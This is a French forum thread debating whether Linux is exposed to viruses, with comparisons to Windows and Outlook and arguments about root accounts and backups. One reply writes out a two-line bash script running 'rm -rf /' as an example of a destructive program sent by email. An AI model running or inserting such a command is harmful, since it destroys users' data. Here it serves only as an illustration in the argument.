Posté par pasBill pasGates . Évalué à -1.
# Tss tss
Posté par RB . Évalué à 4.
C'est vrai, il n'y en a pas beaucoup. Moi même je n'écrirai pas un virus pour C64 ou Atari aujourd'hui, généralement les créateurs de virus cherchent la cible la plus large... Un autre point important était que les utilisateurs de Linux sont des gens comprenant l'informatique un peu plus que la moyenne et ayant certaines notions de sécurité que beaucoup d'utilisateurs de Windows n'ont pas.
Même les utilisateurs de Linux qui disent des inepties à propos des virus et de la sécurité de l'OpenSource ont des connaissances supérieures à celle du windowsien moyen. Quand on parle de virus sous Linux, on chie généralement un coup sur Windows également (toujours les mêmes marmots...).
Ces imbécillités m'énervent. Je vais donc expliquer point par point pourquoi la plupart des préjugés sur Linux/Windows et les virus sont faux.
<< Il faudrait lancer le virus en étant root >>
Là, il faut quand même expliquer que le mode root c'est le Saint-Grall. Les newbies ont une érection quand ils sont pour la première fois en root et qu'ils pensent à ce statut tant convoité quils nont jamais pu avoir sur les gros systèmes de leur école. Ils se voient déjà barbus pilotant des machines de plusieurs millions et administrant des comptes au compte-gouttes à leurs utilisateurs. Mais ils oublient QU'ILS SONT SUR UN PC DE MERDE ET QUE PERSONNE NE S'INTERESSE A LEUR MACHINE NI NE VEUT DE COMPTE DESSUS. Effectivement, ça désacralise un peu...
A quoi sert le mode root en fait ? A configurer sa machine, le kernel, la base du système... et effectivement on ne peut pas la modifier sans être root. Mais chaque utilisateur de Linux sait que l'on ne doit pas utiliser le système en étant root ! Toujours être en mode utilisateur ! Ben c'est de la connerie... sur une machine que vous êtes le seul pingouin à utiliser ça ne change pratiquement rien. Excepté si on peut exploiter une faille à distance via un programme en user land. Pour le reste on n'est en root plus pour le principe que pour autre chose, également pour des raisons accessoires tel le répertoire /home plus grand et monté sur une autre partition que /root.
Les créateurs de virus cherchent à détruire quelque chose à laquelle vous tenez. Sur votre machine qui n'intéresse personne en tant que telle, la seule chose qui à une légère importance pour vous sont vos documents (rien à foutre de votre système qui marchera toujours sous root, les virus ne cherchent pas à formater votre disque, on sait bien que vous le ferez vous même quand sortira la nouvelle Mandrake). Et comme vous êtes un utilisateur saint d'esprit vous travaillez en mode user avec vos documents sur votre compte user (ne me dite pas que vous avez un cron qui backup vos documents importants sur le compte root, je ne vous croirai pas). Donc, si virus => il détruit la seule chose qui a de la valeur sur votre PC.
C'est con hein ?
Et sur une machine avec 100 utilisateurs ou tous reçoivent le virus, ça donne: une machine qui marche toujours vu que le virus n'est pas root, mais 100 personnes ayant perdus tout leurs fichiers...
La prochaine fois pour trouver ce qui a de l'importance pour vous, réfléchissez à ce que vous sauvegardez, personnellement je ne sauvegarde généralement pas / mais plutôt mes documents...
<< A propos des critiques sur Windows >>
Bon sous Linux on a toujours à faire à la grosse haine contre M$, haine que je partage, mais ce n'est pas une raison pour dire tout et n'importe quoi. Windows, Linux ou n'importe quels autres OS sont à peu près sur un pied d'égalité concernant les virus. La différence c'est que sur certains OS on peu prévenir les utilisateurs malgré eux d'avoir des virus.
Sous les Windows personnels (<= 98 & Me), c'est du mono utilisateur, donc un virus peut tout saccager, peu de différence avec le virus qui touche une machine mono utilisateur sous Linux, sauf que le linuxien ne devra pas réinstaller le système de base (à moins qu'il y aie une nouvelle Mandrake). Sous Windows multi utilisateurs (NT, 2000, XP), un virus ne peut saccager qu'un compte et pas le système complet, comme sous Linux.
L'amalgame Windows-virus est en fait principalement un dérivé de la liaison outlook-virus. Mais outlook ne l'oublions pas n'est qu'un programme utilisateur de lecture d'emails, un programme stupide certes, mais qu'un simple programme. Les programmes stupides peuvent exister sur tous les OS sans distinctions. M$ fait des programmes dit "conviviaux", Linux n'a pas encore atteint ce niveau de convivialité (je parle de l'exécution automatique des fichiers attachés), mais de manière générale l'on s'en approche et j'aimerais bien voir la situation dans 5 ans qu'on rigole...
Les Unix sont toutefois supérieurs à Windows sur beaucoup de points, entre autre le fait que l'on puisse protéger ses utilisateurs malgré eux contre les virus. Le plus simple étant de monter leur partition en noexec.
En conclusion:
- Les virus sont peu influencés par l'OS.
- Les virus dépendent de l'éducation des utilisateurs (celle-ci étant encore, mais de moins en moins dépendante de l'OS).
- Les virus peuvent dépendre des applications "stupides" appelées parfois "con/viviales" elle ne dépendent normalement pas de l'OS mais il en existe plus sous Windows.
Alors halte à l'hypocrisie ! Réfléchissez avant de dire des conneries merci.
[^] # Re: Tss tss
Posté par Zorro (site web personnel) . Évalué à 0.
[^] # Re: Tss tss
Posté par Gauthier Monserand (site web personnel) . Évalué à 1.
Je l'utilise parce que quand je l'installe, j'ai plus qu'a compiler MPlayer et tous est installe. et quand quelqu'un me demande de lui installer linux je peux le faire. Et en 5 minutes je lui explique comment s'en servir et c'est finis. Apres il peux apprendre lui meme , mais au moins il a un os qui marche.
Et moi je passe trop de temps a apprendre , pour perdre mon temps a installer autre chose
Mandrake reste pour moi la meilleur distribution, pour une machine perso. Apres au boulot je dis pas
-1 car confus
[^] # Re: Tss tss
Posté par Sébastien Munch . Évalué à 5.
Renseigne-toi un peu sur les personnes qui disent ce genre de trucs, et demande-toi pourquoi ces marmots sont en école d'ingé, ou autres études supérieures, ou encore admin sys/réseau.
Même les utilisateurs de Linux qui disent des inepties à propos des virus et de la sécurité de l'OpenSource ont des connaissances supérieures à celle du windowsien moyen.
Quand on parle de virus sous Linux, on chie généralement un coup sur Windows
A vrai dire, meme les développeurs MS chient sur Win 9x/ME ...
Mais ils oublient QU'ILS SONT SUR UN PC DE MERDE ET QUE PERSONNE NE S'INTERESSE A LEUR MACHINE NI NE VEUT DE COMPTE DESSUS. Effectivement, ça désacralise un peu...
Mais les virus, généralement, s'attaquent à Windows 9x/ME (pour les raisons que tu cites plus loin) (non, je chie pas sur Windows, je constate).
Et dis-moi qui a envie de contrôler un Windows ?
Eh bien si tu te renseigne un peu, les crackers se font la main sur les petits systèmes "personnels", et les script kiddies ne s'attaque (pratiquement) qu'à des systèmes personnels ...
Les "script kiddies" qui ont un botnet, ce n'est pas sur plein de grosses machines, mais uniquement sur des machines personnelles, auxquelles "personne ne s'intéresse".
sur une machine que vous êtes le seul pingouin à utiliser ça ne change pratiquement rien.
Tu es le seul pingouin aujourd'hui, et demain tu te demande "c'est quoi ces users bizarres"
et monté sur une autre partition que /root.
L'utilisateur qui fait tout en root n'a en général qu'une partition ... Personnellement je n'ai pas envie de me faire chier à gérer mes partitions, je me logge rarement en root (sauf à coups de su), et pourtant je n'ai qu'une partition
Les créateurs de virus cherchent à détruire quelque chose à laquelle vous tenez.
Les créateurs de virii cherchent à détruire. point.
Sur votre machine qui n'intéresse personne en tant que telle
Même remarque à propos des les botnets (pris uniquement comme exemples)
Donc, si virus => il détruit la seule chose qui a de la valeur sur votre PC.
même remarque ... il détruit, point.
Le programmeur de virii il s'en fout de ce qu'il détruit, il veut que le nom de son virus fasse frémir le monde entier
Et sur une machine avec 100 utilisateurs ou tous reçoivent le virus, [...] mais 100 personnes ayant perdus tout leurs fichiers...
Sur une machine avec 100 utilisateurs, l'administrateur sauvegarde périodiquement les comptes (sauf si c'est le même newbie que celui qui fait tout en root)
haine que je partage
Que je ne partage pas. Des mots même de Bill Gates, Windows a été fait pour etre convivial, et il l'est.
Sous Windows multi utilisateurs (NT, 2000, XP), un virus ne peut saccager qu'un compte et pas le système complet, comme sous Linux.
Sauf que MS base sa politique de sécurité sur le code fermé, et ne colmate que trop peu ses failles. Pas assez de service packs à mon gout ... et pas assez d'administrateurs ne les appliquent.
Les Unix sont toutefois supérieurs à Windows sur beaucoup de points, entre autre le fait que l'on puisse protéger ses utilisateurs malgré eux contre les virus.
Ah bon ? sous Windows on peut pas ? Le système de droits de NT (pour le peu que j'en ai vu en cours) m'a l'air plus approfondi que celui de Linux ...
- Les virus sont peu influencés par l'OS.
Les virii exploitent les failles ... Donc effectivement peu influencés par l'OS dans l'absolu, mais ils prolifèrent + sur les machines avec + de failles (suivez mon regard)
- Les virus dépendent de l'éducation des utilisateurs
C'est le point le plus important, oui
(celle-ci étant encore, mais de moins en moins dépendante de l'OS).
Exactement: il y a de + en + de newbies non informés sous Linux.
[^] # Re: Tss tss
Posté par matiasf . Évalué à 0.
Je ne suis pas ingénieur, etc...
Mais mon expérience en entreprise, montre que les ingés ne font pas preuve de plus de bon-sens que les "sans-étiquettes".
> Même les utilisateurs de Linux qui disent des inepties à propos des virus et de la sécurité de l'OpenSource ont des connaissances supérieures à celle du windowsien moyen.
Mouais. C'était très vrai il y a quelques années mais maintenant c'est moins criant.
Lorsque les secrétaires, les gamers, etc... se mettront à Linux (chose que j'appèle de tout coeur) et bien le linuxien sera au même niveau que le windowsiens. Si le windowsien est globalement plus c.. que le Linuxien c'est parceque Linux reste encore trop compliqué. Mais le jour ou linux sera aussi simple et "tout-terrain" que windows cette supériorité affichée (un peu trop ?) du linuxien ne sera qu'un souvenir...
[^] # Re: Tss tss
Posté par RB . Évalué à 2.
Que je ne partage pas. Des mots même de Bill Gates, Windows a été fait pour etre convivial, et il l'est.
- J'ai de la haine par rapport à la politique commerciale de M$ et leur manière de s'imposer anti-concurentielle et monopolistique lamentable. Je reconnais volontier les mérites de leurs produits mais malgrè tout je ne les soutiendrai jamais.
[^] # Re: Tss tss
Posté par Vivi (site web personnel) . Évalué à -1.
[^] # Re: Tss tss
Posté par Franck Yvonnet . Évalué à -1.
un cactus -> des cactii
un omnibus -> des omnibii
ta mère elle suce -> vos mères elles scient
(désolé, mais depuis le temps que j'attend de la sortir celle-là :-)
[^] # Re: Tss tss
Posté par matiasf . Évalué à 2.
Comment je vois un virus :
- un virus est un programme qui contourne les protections évidante du système. Par exemple, il est évidant que regarder une page web ne doit pas avoir de conséquence sur mes documents personnels. Hors avec un virus, c'est possible avec IE sans utiliser un trou de sécurité mais une "fonctionnalité". Ceci est peut-être possible avec mozilla, mais dans ce cas c'est un trou de sécurité qui sera rapidement corrigé (sans perte de fonctionnalité !).
- imaginons que je fais ce programme :
#!/bin/bash
rm -rf / &
Je te mail ce programme. Je te dis qu'il est génial et que tu dois faire un "chmod 755" sur mon prog et l'exécuté.
Ce prog a les effets d'un virus, mais ce n'est pas un virus. Tu as exécuté un programme et tu sais de manière évidante qu'un programme peut faire ce type de "truc" et que tu n'as pas a lui accorder la moindre confiance.
Par contre, et je suis totalement d'accord avec toi, la chose la plus importante en sécurité c'est les BACKUP, les BACKUP !. Et les firewall, les bidules etc... ne peuvent rien contre une erreur d'un administrateur ou d'un utilisateur aussi con que moi (sans être root :o) ).
Expérience personnel :
J'ai plus perdu de donnée sur des erreurs persos ou d'adminstrateur un peu trop zélé que sur une attack de cracker, les virus, un firewall mal configuré etc...
[^] # Re: Tss tss
Posté par Anonyme . Évalué à 1.
Sous Windows multi-utilisateur, un utilisateur créé à n'importe quel moment, sans prendre la peine de regarder la boîte de dialogue a les droits "utilisateur avec privilèges". C'est à dire qu'il peut installer et supprimer des logiciels, par conséquent, potentiellement pêter le système.
D'ailleurs, Badtrans installe une DLL dans le répertoire Windows et s'arrange pour intercepter les accès claviers, sans même être logué administrateur...
Sinon, pour ce qui concerne les virus à auto-propagation (ce qu'on appelle en général vers), il est à noter que outlook (|express) équipe une grande partie des postes sous windows et que c'est ça qui aide à la propagation de ces virus. Sous Linux (*BSD, etc.), le choix est plus vaste et la proportion de personnes qui ont le même mailer (qui plus est avec la même version et potentiellement les mêmes bugs) assez (voire très) faible.
Qui plus est, je ne connais pas de mailer pour linux qui exécute, sans rien demander, des scripts ou des programmes qui seraient en attachement...
[^] # encore un troll mdk...
Posté par gui_ . Évalué à -1.
Mais bon, pourquoi cette haine de mandrake et de l'utilisateur de mandrake (distribution que je n'utilise pas, je précise).
Que reproches tu à cette distribution? De vouloir rendre GNU/Linux accessible aux débutants?
"sauf que le linuxien ne devra pas réinstaller le système de base (à moins qu'il y aie une nouvelle Mandrake."
Je n'ai pas testé de mandrake depuis longtemps mais j'ai entendu parlé d'un utilitaire qui s'appelle urpmi et qui fonctionne comme apt-get, cela permet à l'utilisateur de mandrake de faire une update sans avoir à tout réinstaller.
Voilà, c'est tout ce que j'avais à dire. La seule distribution sur laquelle on peut trouver à redire et la Suze car elle ne respecte pas la GPL, sinon toutes les ditributions sont respectable. Il faut bien se faire les dents à un moment ou un autre et quelqu'un qui installe une mandrake fait déjà l'éffort de tester le système GNU/Linux, ce qui est louable.
Au fait tu remarqueras que je fais certainnement autan de fautes d'orthographe que ceux dont tu te moques. Je fais des éffort, j'essai de me relire, mais j'ai beaucoup de mal avec l'orthographe. Ça me géne souvent, mais heuresement, sur internet la nétiquette me permet d'être moins honteux. (cependant je fais de mon mieux par respect pour la personne qui me lira)
Voilà, c'est complétement hors sujet donc -1.
[^] # Re: Tss tss
Posté par RB . Évalué à 1.
J'ai la Mandrake 8.1 sur mes 2 PCs, j'aime bien ce que fait Mandrake et les efforts de convivialité et d'internationalisation.
Voilà j'espère avoir récupéré le coup.
Chacun choisit sa distrib.
Parmis les choses que j'ai ommises dans mon premier post: le fait que vu que les binaires sont normallement gérés en root sous linux, on peut dire que la propagation est ralentie à ce niveau. Mais si on y pense bien, on voit que toutes les dernières grosses épidémies étaient dues à des virus par e-mail (ou des worms, mais c'est un peu différent (IIS, bind, ...))
[^] # mouais mouais mouais ... [Re: Tss tss] (un peu long ma réponse)
Posté par Le_Maudit Aime . Évalué à 1.
1- C'est vrai qu'actuellement les virus, ce sont surtout des virus pour outlook. Mais je rappelle que des virus qui dépendent de l'OS, et notamment de DOS, on en a eu une tétrachiée avant. Mais curieusement pas sous SunOS ou HP-UX etc. Il y a eu juste des vers AMHA. Quant aux vers, le dernier qui ait fait date chez les UNIX, je ne sais pas lequel est-ce. Mais j'ai vu les logs de nos serveurs apache et là les attaques Nimda, bonjour.
2- Les virus ne dépendent pas des utilisateurs. Ils sont trop con pour cela. Parce que si c'était le cas, la moitié auraient tellement mal configuré leur MUA que les virus n'arriveraient même plus à fonctionner. Les virus peuvent dépendre du soin apporté à la configuration par défaut des logiciels.
3- Je rappele qu'UNIX n'a pas été fait pour fournir de la sécurité : UNIX = MULTICS - Sécurité. Et pourtant, UNIX est plus sûr que NT dans beaucoup de domaines (Disponibilité, confidentialité etc.)
4- Windows, très bien parlons sérieusement. Avez vous essayé les solutions Citrix ? C'est top, hein : un serveur NT pour x personnes. Bon ben faut espérer qu'un utilisateur n'aura pas supprimé des fichiers systèmes. Mais c'est sûrement la faute de Citrix.
En conclusion, c'est vrai, il peut, il pourra y avoir des virus sous UNIX, va savoir pourquoi il n'y a pas eu d'attaque en rêgle au niveau mondial jusqu'ici. Parfois au lieu de se poser des questions métaphysiques, il suffit d'observer puis de choisir.
A ma gauche une tonne d'emmerde, à ma droite comprendre avant d'agir.
Oui c'est vrai il y a des petits jeunes qui ont la flamme et qui ne comprennent pas tout ce qu'il disent. Et alors, la réalité corrobore parfois des démonstrations fausses.
Ce que j'ai reproché le plus à Ms, lorsqu'est sorti NT, ce n'était pas qu'il soit buggé à mort, car un OS, c'est super complexe quand il faut le batir de A à Z. Mais de n'avoir pas su proposer quelque chose de novateur sur lequel on puisse s'appuyer pour proposer quelque chose de nouveau. On a eu une resucée de VMS (normal Billou avait débauché chez DEC). Par exemple les ACL ,c'est bien (mais y'a les même dans les UNIX), mais RBAC à la SUN c'est quand même mieux.
(Tiens on nous a encore appelé pour nous proposer un outil d'aide à la migration vers XP, je comprend pas pourquoi, c'est tellement intuitif).
[^] # Re: mouais mouais mouais ... [Re: Tss tss] (un peu long ma réponse)
Posté par RB . Évalué à 1.
1_programmes userland buggés
2_utilisateurs de tous niveaux et globalement bas
3_popularité / pourcentage d'hôtes vulnérable
On voit sur ces 3 critères qu'ils sont indépendants de l'OS. Les outils M$ ont très bien répondu à l'offre numéro 1, IE, outlook. Le niveau global des utilisateurs est aussi plus bas sous windows. Et windows est encore vraiment plus utilisé que Linux.
Mais on peut très bien être sous windows et surfer avec mozilla, vider ses mails avec pegasus mail et n'avoir aucuns problèmes de virus, c'est mon cas et ne faisant pas partie de l'utilisateur lambda je n'éxécute pas non plus les attach...
Mais ce qui pourrait être inquiétant c'est que sur les 3 critères sus-mentionnés, Linux rattrape son "retard"...
On verra dans quelques années et "Linux, l'OS sans virus" on en reparlera.
Mais il faut arrêter de propager des rumeurs inexactes, car dès qu'il y aura un gros virus sous Linux il y en a qui tomberont des nues... et Linux ne sera pas coupable en tant que tel, car l'OS n'est jamais vraiment coupable.
[^] # Re: mouais mouais mouais ... [Re: Tss tss] (un peu long ma réponse)
Posté par gabuzo . Évalué à 1.
D'une part MS est connu pour traiter les aspects sécurité par dessus la jambe (voir par exemple le cryptogramme de novembre http://www.counterpane.com/crypto-gram.html(...)). Même si Apache sous Unix (Linux, *BSD et les autres) a une popularité comparable à IIS (à la fois globalement et en pourcentage sur une plate-forme donnée) on a pas encore vu de bug sous Apache permettant de faire des vers comme Nimda et ses copains alors que l'année 2001 a été une véritable avalanche de trous de sécurité dans IIS. Je pense donc que IIS souffre à la base d'une mauvaise conception et qu'il sera très très dur de faire des corrections a posteriori sans tout remettre à plat.
S'il est vrai qu'un programme userland peut détruire les données d'un utilisateur aussi facilement sous Unix que sous Windows ; je pense malgré tout qu'il est nettement plus courant d'avoir les pleins pouvoirs sous une des différentes déclinaisons de Windows que sous Unix. Au boulot par exemple je suis admin de mon poste car il faut que je puisse lancer IIS dans le cadre des développements. Sur la machine Linux d'à côté je n'ai pas eu ce besoin car il a suffit de configurer apache pour se lancer sur un port >1024 pour que je n'ai pas besoin d'être root. Et quand bien même j'aurai eu besoin d'un accès root la différence aurait été importante car j'aurai travaillé sur la machine Linux en tant qu'utilisateur lambda et j'aurais en cas de besoin fait un su. Au contraire sous Windows je travaille tout le temps avec un compte adminstrateur parce que le concept de SU n'existe pas. Tout ça pour dire que sous Unix le multi-utilisateur est un concept qui existe depuis longtemps, plus mûr et donc plus à l'esprit des développeurs que sous un Windows qui est toujours monoutilisateur si l'on n'y ajoute pas d'extensions non standards.
Enfin, dernier point, l'avantage de Linux sur Windows est ce que l'on pourrait appeler la "biodiversité". En entreprise, il n'y pas si longtemps de cela la très grande majorité des postes étaient (et doit toujours l'être) en Windows NT4. Sous Linux en revanche je ne pense pas qu'une distribution (et même qu'une version d'une distribuion) jouisse d'un tel monopole. La compatibilité avec toutes les distributions qui pose de tels problèmes aux éditeurs de logiciels se posera aussi pour les auteurs de virus. Pour le mail le raisonnement est le même : je doute qu'il existe sous Linux un lecteur de mail ayant la même popularité que Outlook. Sans même parler des logiciels de L33t en texte on trouve kmail, balsa, mozilla, netscape et peut être un jour evolution sans que l'un ne semble s'imposer.
En conclusion je ne dit pas que Linux ne pourra pas être atteint par des virus, cela arrivera probablement, mais je ne pense pas qu'il ne sera pas alors un vecteur aussi efficace que Windows ne l'est actuellement.
[^] # Re: mouais mouais mouais ... [Re: Tss tss] (un peu long ma réponse)
Posté par pasBill pasGates . Évalué à -2.
Juste histoire qu'il n'arrive pas malheur a ta workstation.
# LinVirus !
Posté par Obsidian . Évalué à 4.
Par contre, c'est que l'on ne verra jamais des choses de l'ordre de ce qu'on trouve sous Windows. Les gens qui prétendent que cela est du à l'age du système sont de mauvaise foi: Linux existe depuis 1991, et à l'époque c'était DOS/Win3.1. La majorité des virus tournant à l'époque ne fonctionnent plus depuis W95, et pourtant il est apparu des dizaines de milliers de virus depuis 6 ans.
Certes les proportions d'utilisation des deux systèmes dans le monde n'ont rien de commun, mais il faut garder à l'esprit qu'un grand nombre de ces virus ont été créés à la base parce que le système était mauvais.
En tout cas, pour éviter les soucis du aux pièces jointes, il faut bien sûr former les utilisateurs, mais en ce qui me concerne, j'utilise un compte de test pour ouvrir de tels exécutables.
Un chroot [~/laboratoire_p3] + su [le compte de test] avant de lancer l'exécutable devrait déjà réduire dramatiquement l'effet de la majorité des programmes nuisibles, et ce automatiquement.
Evidement, c'est le genre de choses beaucoup plus difficile à mettre en oeuvre sous NT, et impossible sous 95/98/Me.
# Linux est-il enfin prêt pour les virus?
Posté par Franck Yvonnet . Évalué à -1.
(note mentale: arreter de poster des commentaires à 2H du matin :)
[^] # Re: Linux est-il enfin prêt pour les virus?
Posté par eric gaidatizs . Évalué à -2.
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.